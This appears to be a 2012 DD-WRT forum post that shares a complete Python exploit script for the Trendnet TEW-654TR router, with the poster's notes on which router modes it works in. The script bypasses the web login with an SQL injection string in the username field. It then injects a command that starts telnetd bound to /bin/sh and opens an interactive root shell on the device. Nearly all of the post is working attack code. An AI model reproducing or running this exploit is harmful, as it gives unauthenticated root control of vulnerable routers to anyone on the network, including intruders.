dorfd1
DD-WRT User
Joined: 23 Apr 2009
Posts: 68
|
 Posted: Sun May 27, 2012 1:20 Post subject: Trendnet tew-654tr telnet exploit |
 |
http://pastebin.com/TDKAsJzA
| Code: | #!/usr/bin/env python
# Pop a root shell on the TEW-654TR via SQL injection & command injection.
# Currently only works from the LAN side.
import re
import httplib
import urllib
import socket
import os
class Logging:
WARN=0
INFO=1
DEBUG=2
prefixes=[]
prefixes.append(" [!] ")
prefixes.append(" [+] ")
prefixes.append(" [@] ")
@classmethod
def log_msg(klass,msg,level=INFO):
pref=Logging.prefixes[level]
print pref+msg
def test_telnet():
s=socket.socket()
try:
s.connect(("192.168.10.1",23))
except Exception as e:
return False
return True
def check_authentication(data):
fail_re=re.compile('.*<redirect_page>back</redirect_page>.*')
success_re=re.compile('.*<redirect_page>default</redirect_page>')
success=None
for line in data.splitlines():
if fail_re.match(line):
success=False
Logging.log_msg(line,Logging.DEBUG)
break
elif success_re.match(line):
success=True
#Logging.log_msg(line,Logging.DEBUG)
break
return success
SQL_INJECTION="a';select 1;--"
TELNET_INJECTION="/usr/sbin/telnetd -l /bin/sh"
username=SQL_INJECTION
password=""
#use an array of tuples rather than a dict to guarantee parameter order
params="request=login"
params+="&user_name="+username
params+="&user_pwd"+urllib.quote(password)
headers= {"Host":"192.168.10.1",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-us,en;q=0.5",
"Content-Type":"application/x-www-form-urlencoded",
"Referer":"http://192.168.10.1/login.htm"}
Logging.log_msg("Attempting to authenticate using SQL injection.")
#Logging.log_msg("SQL injection string set to: "+SQL_INJECTION)
Logging.log_msg("Sending POST.")
conn=httplib.HTTPConnection("192.168.10.1")
conn.request("POST","/my_cgi.cgi?0.5219313003118983",params,headers)
response=conn.getresponse()
data=response.read()
Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
conn.close()
success=check_authentication(data)
if True==success:
Logging.log_msg("Authentication successful.")
elif False==success:
Logging.log_msg("Authentication failed. Exiting.",Logging.WARN)
exit(1)
else:
Logging.log_msg("Unrecognized result.",Logging.WARN)
exit(1)
Logging.log_msg("Attempting to start telnetd via command injection.")
params="request=admin_webtelnet"
params+="&cmd="+urllib.quote(TELNET_INJECTION)
conn=httplib.HTTPConnection("192.168.10.1")
headers["Referer"]="http://192.168.10.1/st_device.htm"
conn.request("POST","/my_cgi.cgi?0.19909728029442098",params,headers)
response=conn.getresponse()
Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
data=response.read()
conn.close()
if test_telnet():
Logging.log_msg("Telnet started.")
else:
Logging.log_msg("Telnet not started successfully.",Logging.WARN)
exit(1)
Logging.log_msg("Starting interactive telnet session.")
os.system("telnet 192.168.10.1") |
found this via google and it actually does give you access to a root telnet shell on your device.
I've only gotten this exploit to work in router mode.
update
this script works in both ap and router modes.
it fails to work in client mode.
python is required |
|
